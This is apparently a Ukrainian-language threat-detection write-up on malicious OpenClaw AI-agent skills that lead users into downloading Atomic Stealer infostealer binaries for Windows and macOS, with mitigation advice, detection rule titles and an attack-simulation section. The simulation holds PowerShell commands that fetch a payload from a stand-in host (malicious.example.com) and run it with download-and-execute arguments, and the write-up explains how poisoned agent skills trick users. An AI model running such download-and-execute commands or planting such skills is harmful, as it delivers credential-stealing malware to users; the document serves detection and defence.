Від автоматизації до інфекції: Як навички AI-агента OpenClaw стають озброєннями
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Стаття пояснює, як шкідливі навички OpenClaw використовуються як механізм доставки шкідливого програмного забезпечення для користувачів платформи самостійних агентів AI. Зловмисники публікують навички, які здаються нешкідливими, але в підсумку направляють жертв на завантаження та запуск бінарних файлів, контрольованих атакуючими, з зовнішніх джерел. Спостережені навантаження включають виконувані файли Windows та Mach-O файли для macOS, які були ідентифіковані як варіанти сімейства інформаційно-крадіжницьких програм Atomic Stealer. Ця діяльність вводить практичний ризик ланцюга постачання для особистих і розробницьких робочих станцій, що покладаються на навички, надані спільнотою.
Дослідження
VirusTotal Code Insight переглянув понад три тисячі навичок OpenClaw і виявив сотні, що демонстрували шкідливу або високоризикову поведінку. В одному з прикладів, навичка, завантажена користувачем hightower6eu, надавала покрокові інструкції щодо завантаження захищеного паролем ZIP-архіву з GitHub (пароль: openclaw) і виконання openclaw-agent.exe у Windows. На macOS та ж сама навичка спрямувала користувачів на отримання коду, закодованого в Base64, з glot.io, який потім завантажував виконуваний файл Mach-O для виконання. Отримані бінарні файли були виявлені кількома системами безпеки як троянські інформаційно-крадіжницькі програми.
Пом’якшення
Ставтеся до репозиторіїв навичок як до неперевіреного коду і запускайте OpenClaw в ізольованому або суворо обмеженому середовищі. Уникайте копіювання команд із описів навичок і не запускайте бінарні файли, отримані з невірогідних зовнішніх посилань. Для ринкових і спільнотних операторів, впроваджуйте сканування під час публікації, зосереджене на поведінці віддаленого завантаження, обфускованій логіці скриптів і індикаторах крадіжки облікових даних або ексфільтрації даних. У корпоративних налаштуваннях, навчайте користувачів про ризики установки навичок, розроблених спільнотою, і вимагаєте перевірки перед використанням.
Відповідь
Полюйте на пакети навичок OpenClaw, які містять зовнішні завантажувальні URL-адреси, архіви, захищені паролем, або кодовані командні стажери. Попереджайте про виконання невідомих бінарних файлів під назвою openclaw-agent.exe і про підозрілі запуски Mach-O, що слідують за завантаженнями, що скриптуються. Блокуйте підключення до відомих шкідливих доменів і ізолюйте уражені системи для судово-медичної експертизи, щоб підтвердити, чи мало місце виконання інформаційно-крадіжницького програмного забезпечення і викриття облікових даних.
Потік Атаки
Виявлення
Можлива маніпуляція рядками, закодованими в Base64 [MacOS] (через командний рядок)
Переглянути
Спроба підозрілого виконання Curl [MacOS] (через командний рядок)
Переглянути
Атрибути тимчасової папки MacOS Xattr були очищені (через створення процесу)
Переглянути
Можливе впровадження/викрадання даних/C2 через сторонні служби/інструменти (через проксі)
Переглянути
Можливе впровадження/викрадання даних/C2 через сторонні служби/інструменти (через DNS)
Переглянути
Ідентифікатори загроз (HashSha256) для виявлення: Від автоматизації до зараження: Як навички OpenClaw AI Agent використовуються як зброя
Переглянути
Виконання шкідливих навантажень через навички OpenClaw [Створення процесу Linux]
Переглянути
Виявлення шкідливого виконання агента OpenClaw [Створення процесу Windows]
Переглянути
Виконання симуляції
Передумова: Перевірка телеметрії та базовий тест перед польотом повинні бути пройдені.
Обґрунтування: Цей розділ детально описує точне виконання техніки противника (TTP), призначеної для запуску правила виявлення. Команди та сценарій ПОВИННІ безпосередньо відображати виявлені TTP та прагнуть генерувати точну телеметрію, яка очікується від логіки виявлення.
-
Сценарій атаки та команди:
Атакуючий отримав початковий доступ до робочої станції жертви та скинув шкідливий бінарний файлopenclaw-agent.exeу тимчасовий директорій користувача. Бінарний файл виконується з командного рядка, який явно містить ключові словазавантажитиandвиконатищоб завантажити додаткові навантаження з ненадійного C2-сервера і запустити їх у пам’яті. Атакуючий використовує стандартний командний рядок Windows, щоб уникнути специфічних для PowerShell виявлень, тим самим співпадаючи з очікуваннями правила Sigma.- Скиньте навантаження:
$malPath = "$env:TEMPopenclaw-agent.exe" Invoke-WebRequest -Uri "http://malicious.example.com/openclaw-agent.exe" -OutFile $malPath - Виконуйте з підозрілими аргументами:
"%TEMP%openclaw-agent.exe" download http://malicious.example.com/payload.bin execute - Агент контактує з C2-сервером, завантажує
payload.bin, записує його на диск і запускає, все ще використовуючи оригінальну команду процесу, що містить тригерні слова.
- Скиньте навантаження:
-
Сценарій регресійного тесту:
# ----------------------------------------------------------------------- # Імітація виконання агента OpenClaw – запускає виявлення Sigma # ----------------------------------------------------------------------- # 1. Завантажте шкідливий агент (імітується безпечним файлом) $agentUrl = "https://github.com/microsoft/PowerShell/releases/download/v7.4.0/powershell-7.4.0-win-x64.msi" # заповнювач безпечного файлу $agentPath = "$env:TEMPopenclaw-agent.exe" Invoke-WebRequest -Uri $agentUrl -OutFile $agentPath # 2. Виконайте агента з очікуваними ключовими словами командного рядка $cmd = "`"$agentPath`" download http://malicious.example.com/payload.bin execute" Write-Host "Виконання: $cmd" Start-Process -FilePath $agentPath -ArgumentList "download http://malicious.example.com/payload.bin execute" -NoNewWindow -Wait # 3. Додатково: Імітуйте завантаження навантаження (безпечний стуб) $payloadUrl = "https://raw.githubusercontent.com/EbookFoundation/free-programming-books/master/books/free-programming-books.md" $payloadPath = "$env:TEMPpayload.bin" Invoke-WebRequest -Uri $payloadUrl -OutFile $payloadPath Write-Host "Імітація завершена. Перевірте SIEM для виявлення." -
Команди очистки:
# Видаліть всі артефакти, створені під час імітації $paths = @( "$env:TEMPopenclaw-agent.exe", "$env:TEMPpayload.bin" ) foreach ($p in $paths) { if (Test-Path $p) { Remove-Item -Path $p -Force Write-Host "Видалено $p" } }